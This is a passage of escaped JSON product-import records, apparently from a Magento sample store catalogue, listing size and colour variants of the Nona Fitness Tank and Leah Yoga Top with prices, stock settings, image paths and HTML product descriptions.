"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XL-Purple\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1684\":{\"sku\":\"WT04-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XL-Red\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1685\":{\"sku\":\"WT04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cotton|Spandex,pattern=Striped,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT04-XS-Blue,size=XS,color=Blue|sku=WT04-XS-Purple,size=XS,color=Purple|sku=WT04-XS-Red,size=XS,color=Red|sku=WT04-S-Blue,size=S,color=Blue|sku=WT04-S-Purple,size=S,color=Purple|sku=WT04-S-Red,size=S,color=Red|sku=WT04-M-Blue,size=M,color=Blue|sku=WT04-M-Purple,size=M,color=Purple|sku=WT04-M-Red,size=M,color=Red|sku=WT04-L-Blue,size=L,color=Blue|sku=WT04-L-Purple,size=L,color=Purple|sku=WT04-L-Red,size=L,color=Red|sku=WT04-XL-Blue,size=XL,color=Blue|sku=WT04-XL-Purple,size=XL,color=Purple|sku=WT04-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cotton|Spandex\",\"pattern\":\"Striped\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1686\":{\"sku\":\"WT05-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XS-Orange\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1687\":{\"sku\":\"WT05-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XS-Purple\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1688\":{\"sku\":\"WT05-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XS-White\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1689\":{\"sku\":\"WT05-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-S-Orange\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1690\":{\"sku\":\"WT05-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-S-Purple\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1691\":{\"sku\":\"WT05-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-S-White\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 